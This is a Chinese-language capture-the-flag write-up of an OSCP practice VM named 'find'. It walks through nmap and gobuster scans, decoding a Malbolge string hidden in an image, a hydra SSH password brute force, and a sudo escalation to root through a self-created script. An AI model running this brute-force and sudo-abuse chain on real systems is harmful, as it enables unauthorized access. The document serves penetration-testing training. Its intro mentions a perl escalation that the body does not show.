【OSCP】find

OSCP 靶场

靶场介绍

find

easy

Malbolge Languages、strings查看、hydra爆破、sudo perl 提权

信息收集

主机发现

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.31.253
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-13 07:05 EST
Nmap scan report for 192.168.31.253
Host is up (0.00077s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 6e:f7:90:04:84:0d:cd:1e:5d:2e:da:b1:51:d9:bf:57 (RSA)
|   256 39:5a:66:38:f7:64:9a:94:dd:bc:b6:fb:f8:e7:3f:87 (ECDSA)
|_  256 8c:26:e7:26:62:77:16:40:fb:b5:cf:a6:1c:e0:f6:9d (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Apache2 Debian Default Page: It works
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:42:66:BC (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.77 ms 192.168.31.253

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.70 seconds

目录扫描

目录扫描只扫到了一个robots.txt提示find user,另外发现 一张图片，通过strings 查看字符串存在加密信息

gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt      -u http://192.168.31.253/ -x php,html,txt -e
gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt      -u http://192.168.31.253/ -x jpg,png,gif -e

cat cat.jpg
或者
strings cat.jpg

>C<;_"!~}|{zyxwvutsrqponmlkjihgfedcba`_^][ZYXWVUTSRQPONMLKJ`_dcba`_^]Uy<XW
VOsrRKPONGk.-,+*)('&%$#"!~}|{zyxwvutsrqponmlkjihgfedcba`_^][ZYXWVUTSRQPONML
KJIHGFEDZY^W[ZYXWPOsSRQPON0Fj-IHAeR

对字符串进行解密后获取用户名字

https://malbolge.doleczek.pl/

权限获取

 hydra -l missyred -P /usr/share/wordlists/rockyou.txt   ssh://192.168.31.253

权限提升

系统内还存在其他用户，查看user.txt flag 还需要提权到kings 用户

通过sudo 提权到kings 用户，成功获取到user.txt

sudo -l 查看到kings 用户下可以执行boom.sh 脚本，但是并没有该文件

既然没有该文件那么我们就创建一个sh 脚本

kings@find:~$ mkdir /opt/boom
kings@find:~$ echo "bash" > /opt/boom/boom.sh 
kings@find:~$ cat /opt/boom/boom.sh 
bash
kings@find:~$ chmod +x /opt/boom/boom.sh 
kings@find:~$ sudo /opt/boom/boom.sh 
root@find:/home/kings# id
uid=0(root) gid=0(root) groups=0(root)
root@find:/home/kings# cd /root
root@find:~# ls
root.txt
root@find:~# cat root.txt 
c8aaf0f3189e000006c305bbfcbeb790
root@find:~# 

原文始发于微信公众号（贝雷帽SEC）：【OSCP】find